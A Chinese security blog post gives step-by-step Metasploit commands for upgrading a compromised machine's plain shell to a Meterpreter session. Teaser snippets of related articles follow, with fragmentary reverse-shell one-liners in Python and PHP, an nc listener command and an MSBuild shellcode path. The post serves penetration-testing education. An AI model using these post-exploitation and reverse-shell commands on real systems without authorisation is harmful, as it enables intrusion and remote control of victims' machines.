将一个普通的shell升级为meterpreter shell

VSole2022-04-05 22:15:26

在我们进入机器后,有时我们会在渗透后立即获得Meterpreter Shell。meterpreter shell是一个我们比较喜欢的shell,因为方便我们后续加载各种模块,因此,我们希望获得此Shell而不是Command Shell。但大多数情况下,我们在利用机器后,得到的是普通的shell命令。因此,本文介绍了在这种情况下如何将一个简单的shell升级为meterpreter shell。

将一个简单的shell升级为meterpreter shell的步骤:

在利用机器后,我们得到的是普通的shell命令。

步骤一:在当前(普通shell)会话中,我们可以通过按CTRL+Z来执行此操作。

步骤二:现在运行以下命令“search shell_to_meterpreter”

步骤三:按照命令使用显示的模块“use post/multi/manage/shell_to_meterpreter”或简单地输入 “use 0”。这两个命令中的任何一个都可以工作。

步骤四:现在我们必须配置要升级的会话shell。我们可以通过运行以下命令来查看会话,即“sessions -l”,Id=会话编号。

步骤5:我们可以使用“show options”命令查看选项。

步骤6:根据你的会话设置会话ID。我们可以使用以下命令来配置会话,即“set SESSION”,在此例中为“set SESSION 1”。

步骤7:配置会话后,就可以执行它了。我们可以通过简单地给出“run”命令来执行。

输入run命令后,将打开另一个新会话。

新会话打开后,选择该会话并执行。

第 8 步:现在通过运行“session -i ”命令来执行新会话,在此例中,运行的命令是“session -i 2”。

运行最后一个命令后,将成功获得meterpreter shell

shellsession
本作品采用《CC 协议》,转载必须注明作者和本文链接
vulnhub之2much的实践
2023-08-14 09:40:07
vulnhub之2much的实践
最近被安排做一些应急响应的工作,所以学习了一下Linux进程相关的知识,越学越多,那就记下来吧!
很早就想专门写一篇关于内网的文章,一直没有腾出空来,万万没想到,写下这篇文章的时候,竟然是我来某实验室实习的时间段:)
靶场Kioptrix Level 1攻略
2022-04-21 13:47:27
雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经雷神众测允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。
0x01 简介本次测试为实战测试,测试环境是授权项目中的一部分,敏感信息内容已做打码处理,仅供讨论学习。由于本人在内网方面的掌握也是属于新手阶段,运用到的一些msf攻击手法也很基础,请各位表哥多多指教。
跨语言移植一直是技术领域内难以解决的问题,需要解决语言之间的约束,好在先前我们成功使用 Go 实现了 IIOP 协议通信,有了前车之鉴,所以这次我们将继续使用跨语言方式实现 Flask Session 伪造。本文以 Apache Superset 权限绕过漏洞(CVE-2023-27524) 为例讲述我们是如何在 Go 中实现 Flask 框架的 Session 验证、生成功能的。
在我们渗透测试的过程中,最常用的就是基于tcp/udp协议反弹一个shell,也就是反向连接。我们先来讲一下什么是正向连接和反向连接。centos执行python -c 'import socket,subprocess,os;s=socket.socket;s.connect;os.dup2; os.dup2; os.dup2;p=subprocess.call;'. 这个payload是反向连接并且只支持Linux,Windows可以参考离别歌师傅的python windows正向连接后门。这样会把目标机的/bin/bash反弹给攻击机但是很多Linux的nc很多都是阉割版的,如果目标机器没有nc或者没有-e选项的话,不建议使用nc的方式.PHP攻击机监听nc -lvvp 4444. 要求目标机器有php然后执行php -r '$sock=fsockopen;exec;'. 加载64位的shellcode需要用64位的msbuildC:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
在我们进入机器后,有时我们会在渗透后立即获得Meterpreter Shell。meterpreter shell是一个我们比较喜欢的shell,因为方便我们后续加载各种模块,因此,我们希望获得此Shell而不是Command Shell
常用反弹shell方法总结
VSole
网络安全专家